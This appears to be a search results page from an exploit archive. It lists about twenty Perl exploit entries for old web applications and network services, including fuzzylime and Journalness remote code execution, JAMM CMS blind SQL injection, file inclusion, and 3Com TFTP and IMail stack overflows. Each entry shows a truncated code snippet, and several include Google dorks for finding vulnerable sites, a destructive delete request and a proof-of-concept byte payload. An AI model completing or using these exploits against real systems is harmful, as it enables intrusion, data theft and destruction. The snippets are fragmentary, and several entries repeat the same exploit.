178 matches found
fuzzylime cms 3.01 Remote Command Execution Exploit
Exploit for unknown platform in category web applications =================================================== fuzzylime cms 3.01 Remote Command Execution Exploit =================================================== !/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams DESCRIPTION...
butterfly-delete.txt
!/usr/bin/perl -w Butterfly Organizer 2.0.0 ; $b = LWP::UserAgent-new or die "Could not initialize browser\n"; $b-agent'Mozilla/4.0 compatible; MSIE 7.0; Windows NT 5.1'; $host = $ARGV0 . "/category-delete.php?tablehere=".$cat."&isjsconfirmed=1"; $res = $b-requestHTTP::Request-newGET=$host; $answ...
jammcms-sql.txt
!/usr/bin/perl JAMM CMS id Blind SQL Injection Vulnerability Bug by: h0yt3r Dork: "powered by JAMM" http://www.site.de/cms/?id=blah Ok when we give $id an unexpected value like this we get an SQL Error. Unfortunately the script is so rude that it doesn't want to show us any data when we UNION...
JAMM CMS - id Blind SQL Injection
JAMM CMS - id Blind SQL Injection !/usr/bin/perl JAMM CMS id Blind SQL Injection Vulnerability Bug by: h0yt3r Dork: "powered by JAMM" http://www.site.de/cms/?id=blah Ok when we give $id an unexpected value like this we get an SQL Error. Unfortunately the script is so rude that it doesn't want to...
JAMM CMS (id) Remote Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ================================================ JAMM CMS id Remote Blind SQL Injection Exploit ================================================ !/usr/bin/perl JAMM CMS id Blind SQL Injection Vulnerability Bug by: h0yt3r Dork: "powered by...
JAMM CMS - 'id' Blind SQL Injection
!/usr/bin/perl JAMM CMS id Blind SQL Injection Vulnerability Bug by: h0yt3r Dork: "powered by JAMM" http://www.site.de/cms/?id=blah Ok when we give $id an unexpected value like this we get an SQL Error. Unfortunately the script is so rude that it doesn't want to show us any data when we UNION...
xinelib-overflow.txt
xine-lib title = strdup&header0x0E; demuxnsfsendchunk: 122: char title100; 162: sprintftitle, "%s, song %d/%d", this-title, this-currentsong, this-totalsongs; - Affected applications http://xinehq.de/index.php/releases - PoC perl -e 'print "\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A...
Journalness 4.1 - last_module Remote Code Execution
Journalness 4.1 - lastmodule Remote Code Execution !/usr/bin/perl Vendor url: journalness.sourceforge.net note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Journalness ; if$target ! /^http:/// $target = "http://".$target;...
Mini File Host 1.2.1 (upload.php language) Local File Inclusion Exploit
No description provided by source. !/usr/bin/perl Name: Mini File Host 1.2.1 "Security Fixed release" and earlier Vulnerability type: Local File Inclusion through POST requests pages/upload.php Authors: Scary-Boys: original GET-vulnerability, 2008-01-17 shinmai: POST-request vulnerability in late...
IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow
IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow !/use/bin/perl Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit Author: ZhenHan.Liuph4nt0m.org Date: 2007-07-25 Team: Ph4nt0m Security Team http://www.ph4nt0m.org Vuln Found by: Manuel Santamarina Suarez...
HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit
Exploit for unknown platform in category remote exploits ================================================================= HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit ================================================================= !/usr/bin/perl POC exploit for Mercury...
3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl)
No description provided by source. !/usr/bin/perl -w =============================================================================================== 3Com TFTP Service = 2.0.1 Long Transporting Mode Overflow Perl Exploit By Umesh Wanve [email protected]...
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)
3Com TFTP Service 3CTftpSvc 2.0.1 - Long Transporting Mode Perl !/usr/bin/perl -w =============================================================================================== 3Com TFTP Service \n\n"; exit; $target = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$A...
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
!/usr/bin/perl -w =============================================================================================== 3Com TFTP Service \n\n"; exit; $target = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$ARGV1...
News Rover 12.1 Rev 1 - Stack Overflow (2)
News Rover 12.1 Rev 1 - Stack Overflow 2 !/usr/bin/perl =============================================================================================== News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit By Umesh Wanve [email protected]...
webSPELL 4.01.02 - 'showonly' Blind SQL Injection
!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print "\n \'/ "; print "\n -.- "; print "\n -------------------oOO------OOo-------------------"; print "\n | webSPELL v4.01.02 showonly Remote SQL Injection |"; print "\n | works only with registerglobals = on |"; print "\n | coded by...
Tucows Client Code Suite (CSS) <= 1.2.1015 File Include Vulnerability
Exploit for unknown platform in category web applications ===================================================================== Tucows Client Code Suite CSS $cmd=$; chomp$cmd; $xpl = LWP::UserAgent-new or die; $req =...
MosReporter Joomla Component 0.9.3 Remote File Include Exploit
Exploit for unknown platform in category web applications ============================================================== MosReporter Joomla Component 0.9.3 Remote File Include Exploit ============================================================== !/usr/bin/perl MosReporter Joomla Component Remote...
AspPired2Poll 1.0 - 'MoreInfo.asp' SQL Injection
!/usr/bin/perl Script Name: AspPired2 Poll newProto = "tcp", PeerAddr = "$server", PeerPort = "$port" || die "\n+ Connection failed...\n"; print $socket "GET $target\n"; print $socket "Host: $server\n"; print $socket "Accept: /\n"; print $socket "Connection: close\n\n"; print "+ Conn...
ColdFusion MX Remote Development Service Exploit
No description provided by source. !/usr/bin/perl RDScDump.pl By angry packet THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need to recreate these functions. This is a "almost"...